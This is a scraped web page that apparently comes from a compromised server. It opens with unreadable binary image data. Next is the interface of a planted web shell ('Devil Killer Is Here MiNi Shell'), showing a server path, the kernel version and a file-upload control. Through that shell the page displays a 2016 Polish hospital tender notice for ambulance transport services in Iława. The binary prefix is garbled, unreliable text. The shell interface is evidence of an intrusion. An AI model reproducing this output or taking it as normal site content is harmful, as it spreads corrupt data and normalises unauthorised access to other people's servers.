JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160428/107166-N-2016.html

<p class="kh_header"><b>Iława: Przedmiotem zamówienia jest świadczenie usług transportu sanitarnego na rzecz Powiatowego Szpitala im. Wł. Biegańskiego w Iławie przez okres 19 miesięcy nr sprawy 9/2016</b><br>
<b>Numer ogłoszenia: 107166 - 2016; data zamieszczenia: 28.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie , ul. Gen. Wł. Andersa 3, 14-200 Iława, woj. warmińsko-mazurskie, tel. 89 6449601, faks 89 6492425.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> szpital.ilawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest świadczenie usług transportu sanitarnego na rzecz Powiatowego Szpitala im. Wł. Biegańskiego w Iławie przez okres 19 miesięcy nr sprawy 9/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług transportu sanitarnego na rzecz Powiatowego Szpitala im. Wł. Biegańskiego w Iławie przez okres 19 miesięcy nr sprawy 9/2016 w następujących zakresach:
Zadanie nr 1 - Transport sanitarny
a)	Przewóz chorych wymagających konsultacji lekarza specjalisty lub wykonania badania diagnostycznego w innym zakładzie opieki zdrowotnej (przewóz, doprowadzenie pacjenta do miejsca konsultacji lub badań, przekazanie dokumentacji medycznej),
b)	Przewóz chorych do innego zakładu opieki zdrowotnej w celu kontynuowania leczenia      (przewóz, doprowadzenie pacjenta do miejsca konsultacji lub badań, przekazanie dokumentacji medycznej),
c)	Transport materiału biologicznego oraz odbieranie wyników badań laboratoryjnych, histopatologicznych i innych zgodnie ze zleceniem Zamawiającego,
d)	Transport chorych niezdolnych do korzystania z publicznych środków transportowych do miejsca zamieszkania po zakończonym leczeniu u Zamawiającego,
e)	Innych zleconych przewozów.
      Zadanie nr 2 - Transport specjalistyczny
a)	Przewóz pacjentów karetką S ze składem osobowym i wyposażeniem zgodnymi z określonymi zarządzeniem Nr 65/2012/DSM Prezesa Narodowego Funduszu Zdrowia z dnia 17 października 2012 r. w sprawie określenia warunków zawierania i realizacji umów o udzielanie świadczeń opieki zdrowotnej w rodzaju  ratownictwo medyczne ze zmianami. 
2.	Usługi będące przedmiotem zamówienia świadczone będą środkami transportu - Zadanie nr 1 (pojazd sanitarny typu A2), Zadanie nr 2 (pojazd sanitarny typu C), stanowiącymi własność Wykonawcy (wyposażonymi zgodnie z wymaganiami) oraz przez kierowców Wykonawcy w szacunkowych ilościach wyliczonych na podstawie danych wynikających z realizacji transportów sanitarnych za ostatni rok.
Zadanie nr 1
Szacunkowa ilość kilometrów - 300 738 km 
Szacunkowa ilość godzin - 8 457 godzin 
Zadanie nr 2
Szacunkowa ilość kilometrów - 23 750 km 
Szacunkowa ilość godzin -  478 godzin 

3.	Kierowcy Wykonawcy muszą posiadać stosowne kwalifikacje do obsługi karetki. Oprócz świadczenia usług transportu sanitarnego są zobowiązani do wykonywania czynności sanitariusza.
Ponadto podczas realizacji umowy kierowcy Wykonawcy zobowiązani są do wykonywania poleceń pracowników Zamawiającego, w szczególności lekarzy, ratowników medycznych oraz dyspozytora.
4.	Przystąpienie do wykonania zleconych usług powinno nastąpić  dla zadania nr 1 - nie później niż w ciągu 20 minut od otrzymania zlecenia (telefonicznie lub faxem) na pierwsze wezwanie i uruchomienie wyjazdów następnych zespołów w ciągu 1 godziny od kolejnych wezwań, dla zadania nr 2 - nie później niż w ciągu 80 minut od otrzymania zlecenia. Czas przystąpienia do realizacji zleconej usługi obejmuje czas jaki upłynie od momentu zgłoszenia zapotrzebowania na usługę przez Zamawiającego do momentu podstawienia we wskazanym miejscu środka transportowego do jego dyspozycji.
5.	Świadczone usługi muszą być na wysokim poziomie jakościowym, zgodne z obowiązującymi normami technicznymi i przepisami prawa oraz postanowieniami umowy, przy zachowaniu należytej staranności oraz całodobowej gotowości do świadczenia usług na rzecz Zamawiającego.
6.	Pojazdy używane do realizacji zamówienia muszą być sprawne technicznie, posiadać aktualne badania techniczne i ubezpieczenie OC, NNW oraz spełniać wymogi określone w Rozporządzeniu Ministra Infrastruktury z 31 grudnia 2002 (30 stycznia 2015 r.) w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2015 roku,  poz. 305).
7.	Usługa powinna być świadczona zgodnie z zasadami określonymi w ustawie z dnia 8 września 2006 r. o Państwowym Ratownictwie Medycznym (tekst jednolity Dz.U. z 2016 r., poz. 65),
8.	Fakturę za wykonaną usługę Wykonawca wystawia :
	W przypadku pełnej odpłatności za usługę   -  na Zamawiającego,
	W przypadku częściowej odpłatności - na Zamawiającego w wysokości na niego przypadającej, a w pozostałej części Wykonawca rozlicza się bezpośrednio z pacjentem,
	W przypadku pełnej odpłatności za usługę przez pacjenta - Wykonawca rozlicza się bezpośrednio z pacjentem
9.	Wykonawca spełnia wymogi art. 36-39 ustawy o ochronie danych osobowych (Dz.U. 1997 nr 133 poz. 883) a mianowicie posiada politykę bezpieczeństwa w zakresie danych osobowych i instrukcję zarządzania systemem informatycznym.
10.	Zasady odpłatności za usługę wynikają z przepisów ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych (Dz.U. 2004 Nr 210 Poz. 2135 ze. zm.) stosownie do art. 5 pkt. 34 i 38 w/w ustawy transport sanitarny jest świadczeniem opieki zdrowotnej o charakterze towarzyszącym świadczeniu zdrowotnemu. Zatem zasady odpłatności wynikające z art. 41 ust. 3 w/w ustawy,  regulują poszczególne rozporządzenia Ministra Zdrowia wydane na podstawie art. 31d u.ś.o.z..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 19.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 
10.000,00PLN
11.2. Wadium może być wniesione w następujących formach:
11.2.1. pieniądzu,
11.2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym,
11.2.3. gwarancjach ubezpieczeniowych, lub gwarancjach bankowych,
11.2.4 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości oraz niektórych ustaw (tekst jednolity z 2007 r. nr 42 poz. 275 ze zm.)
11.3. W przypadku złożenia wadium w pieniądzu, wadium należy wpłacić przelewem na konto  Zamawiającego BGŻ SA O/Iława 25 2030 0045 1110 0000 0178 3970 z adnotacją Wadium - postępowanie nr 9/2016.
11.4.	Poręczenia i gwarancje zagranicznych banków, gwarancje zagranicznych towarzystw ubezpieczeniowych powinny być potwierdzone przez polski bank.
11.5.	Warunki zwrotu wadium lub jego utraty, stosownie do art. 46 ustawy.
Wadium winno być na koncie Zamawiającego nie później niż przed upływem terminu 
składania ofert. 
11.6. W przypadku złożenia wadium w formie gwarancji, poręczeń, oryginał dokumentu należy złożyć nie później niż przed upływem terminu składania ofert I piętro Kancelaria. Kopię dokumentu, należy dołączyć do oferty, za wyjątkiem pkt. 11.3.
11.7. Jeśli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium 
załączyć do oferty, natomiast oryginał umieścić w oznaczonej kopercie oryginał dowodu wniesienia wadium. 
11.8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty  najkorzystniejszej   lub unieważnieniu postępowania , z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust 4a ustawy. 
11.9. Na pisemny wniosek Wykonawcy, Zamawiający zwróci wadium niezwłocznie Wykonawcy  który wycofał ofertę przed upływem terminu składania ofert,
11.10. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone  o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
11.11. Wadium wraz z odsetkami wniesione w pieniądzu przez Wykonawcę, którego oferta została uznana za najkorzystniejszą, na wniosek tego Wykonawcy, zaliczane jest przez Zamawiającego na poczet zabezpieczenia należytego wykonania umowy (o ile zabezpieczenie jest wymagane).
11.12. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 11.8., jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego. 
11.13. Wykonawca, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
11.13.1 odmówił podpisania umowy na warunkach określonych w ofercie,
11.13.2 nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
11.13.3 zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
11.13.4  jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 w/w ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.1 W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.1 SIWZ posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca składa oświadczenie o spełnieniu warunku zgodnie z wzorem- Załącznik nr 2. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.2. 	W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.2 posiadania wiedzy i doświadczenia, dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego oświadczenia. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.3 W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.3 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
1)Zamawiający wymaga, aby Wykonawca udowodnił, że dysponuje: 
1.1) dla Zadania nr 1 Transport sanitarny
min. 2 pojazdy przystosowane do transportu sanitarnego- wyposażenie pojazdów zgodne z Polską Normą przenoszącą europejskie normy zharmonizowane (PN-EN 1789:2008) określającą wymagania dla typu ambulansu A2 - ambulans do transportu pacjentów 
1.2)dla Zadania nr 2 Transport specjalistyczny
Min. 1 pojazd przystosowany do transportu specjalistycznego - wyposażenie pojazdu zgodne z Polską Normą przenoszącą europejskie normy zharmonizowane (PN-EN 1789:2008) określającą wymagania dla typu ambulansu C - ruchoma jednostka intensywnej opieki

 Dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył wykaz urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami zgodnie ze wzorem Załącznik nr 7 Wykaz środków transportu oraz oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionego wykazu i oświadczenia. 
Na potwierdzenie spełniania tego warunku Wykonawca zobowiązany jest również dostarczyć wraz z ofertą następujące dokumenty potwierdzające, że pojazd jest zarejestrowany na terenie Polski, jako samochód specjalny sanitarny spełniający normę PN EN 1789 (dla każdego z wykazywanych pojazdów w wymaganym zakresie tj. dla Zadania nr 1 A2, dla Zadania nr 2 C):
- kserokopia dowodu rejestracyjnego;
- świadectwo homologacji typu pojazdu dotyczące rozszerzenia homologacji typu pojazdu
skompletowanego - wydane przez upoważniony do tego organ (Ministerstwo Infrastruktury;
Ministerstwo Infrastruktury i Rozwoju), lub wyciąg ze świadectwa homologacji dla
skompletowanych pojazdów, wydany przez producenta pojazdu lub producenta ostatniego
etapu budowy pojazdu;
- deklaracja zgodności wydana przez producenta ostatniego etapu budowy pojazdu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.2.4.W zakresie warunku wskazanego w części III SIWZ ust. 2 pkt. 2.1 ppkt 2.1.4 znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
Zamawiający wymaga, aby wykonawca udowodnił, że:
1) posiada opłaconą na min. 250.000,00 zł brutto polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia
Dla uznania, że wykonawca spełnia warunek zamawiający żąda, by wykonawca złożył w/w polisę oraz oświadczenie o spełnieniu warunku zgodnie z wzorem - Załącznik nr 2 do SIWZ, że znajduje się sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Ocena spełniania warunku nastąpi na podstawie załączonego do oferty w/w wymienionej polisy i oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">3.4.	politykę bezpieczeństwa w zakresie danych osobowych i instrukcję zarządzania systemem informatycznym.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.3.	Wypełniony i podpisany formularz Specyfikacji przedmiotowej (formularz cenowy), stanowiący załącznik nr 4  do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może być zmieniona w stosunku do złożonej oferty i na niżej wymienionych warunkach:
a)	zmiana dotyczy nieistotnych postanowień zawartej umowy,
b)	gdy podczas realizacji umowy wystąpią nieprzewidywalne zdarzenia lub okoliczności, jak w szczególności klęski żywiołowe, strajki, zamieszki, konflikty zbrojne, które uniemożliwiają zrealizowanie przedmiotu zamówienia w sposób, w zakresie i w terminie przewidzianym w ofercie.
c)	istotnej zmiany stosunków spełnianie świadczenia byłoby połączone z nadmiernymi trudnościami lub groziłoby, co najmniej jednej ze stron znaczną stratą, a czego strony nie mogły przewidzieć przy zawarciu umowy - w przypadku istotnej zmiany stosunków takiej jak znaczny wzrost cen surowców, nośników energii itp.
d)	obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia - w przypadku promocji, ogólnej obniżki cen na dany asortyment itp.
e)	odchylenia od kursu walut wzrost/spadek o więcej niż 10% w stosunku do kursu z dnia podpisania umowy (wg  tabeli NBP),
f)	zmian koniecznych ze względu na zmianę powszechnie obowiązujących przepisów prawa, w szczególności stawek podatku VAT, stawek celnych - w przypadku zaistnienia takich zmian
g)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub specyfikacji istotnych warunków zamówienia.
Wszelkie zmiany do niniejszej umowy wymagają zgody Zamawiającego oraz pod rygorem nieważności zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.ilawa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Pokój nr 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2016 godzina 10:00, miejsce: Powiatowy Szpital im. Władysława Biegańskiego w Iławie ul. Gen. Wł. Andersa 3 14-200 Iława Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





